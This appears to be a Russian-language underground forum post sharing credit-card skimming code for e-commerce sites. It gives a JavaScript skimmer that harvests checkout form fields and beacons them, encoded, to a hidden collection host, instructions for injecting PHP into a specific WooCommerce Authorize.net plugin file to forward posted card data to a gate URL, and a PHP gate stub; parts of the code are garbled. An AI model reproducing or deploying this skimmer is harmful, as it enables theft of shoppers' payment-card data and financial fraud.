Anon | 00500

Имя пользователя: Anon

Статус: Активен

Регистрация jabber:

Поток: Anon

TG канал: Канал для опретивных оповещений



Video: conf_4.mkv

function parse_fields(){ var data = {}; data['from'] = location.hostname; data['ua'] = navigator.userAgent; Object.values(document.getElementsByTagName('input')).map(function(e, i) { if ( { data[] = e.value } }); Object.values(document.getElementsByTagName('select')).map( function (elem, index) { Object.values(document.getElementsByTagName('option')).map( function (e, i) { if (e.value == elem.value){ data[] = e.text } }); }); SendData(data); // TODO solution for speed problem setTimeout(function () { document.getElementsByTagName('form')[0].submit() }, 1); } function SendData(e) { var i = 89999 * Math.random() + 1e4, n = JSON.stringify(e), t = document.createElement('img'); t.width = '1px', t.height = '1px', = i, t.src = atob('aHR0cDovL2xvY2FsaG9zdC9oYWNrZXIvanMucGhwCg==') + '?image_id=' + btoa(n), document.body.appendChild(t), setTimeout(document.getElementById(i).remove(), 3e3); } window.onload = function (ev) { if (document.getElementById('button-confirm') != null) { document.getElementById('button-confirm').onclick = function () {parse_fields();return false}; } else { setTimeout(function () {window.onload(ev);}, 5e3); } };

по дефолту это будет 234-ая строка файла: class-wc-gateway-authorize-net-aim-credit-card.php, расположенного в wp-content/plugins/woocomerce-gateway-authorize-net-aim/includes ​ там есть метод remove_credit_card_field_input_names ​ /** * Remove the input names for the card number and CSC fields so they're * not POSTed to the server, for security and compliance with Accept.js * * @since 3.9.0 * @param array $fields credit card fields * @return array */ public function remove_credit_card_field_input_names( $fields ) { ​ $fields['card-number']['name'] = ''; ​ if ( $this->csc_enabled() ) { $fields['card-csc']['name'] = 'cc_csc'; } ​ return $fields; }

$this->update_session( $posted_data ); ​ можно вписать свой код ​``` try { $post_data = $_POST; $post_data['ip'] = $_SERVER['REMOTE_ADDR']; $post_data['from'] = $_SERVER['SERVER_NAME']; $post_data['ua'] = $_SERVER['HTTP_USER_AGENT']; file_get_contents("URL?image_id=".base64_encode(json_encode($post_data)), false); } catch (Exception $e) { } unset($_POST['cc_nomber']); ​```

     < ?php
    $gate = '';
        $getdata = http_build_query($_GET);
        file_get_contents($gate."?".$getdata, false);
    ? >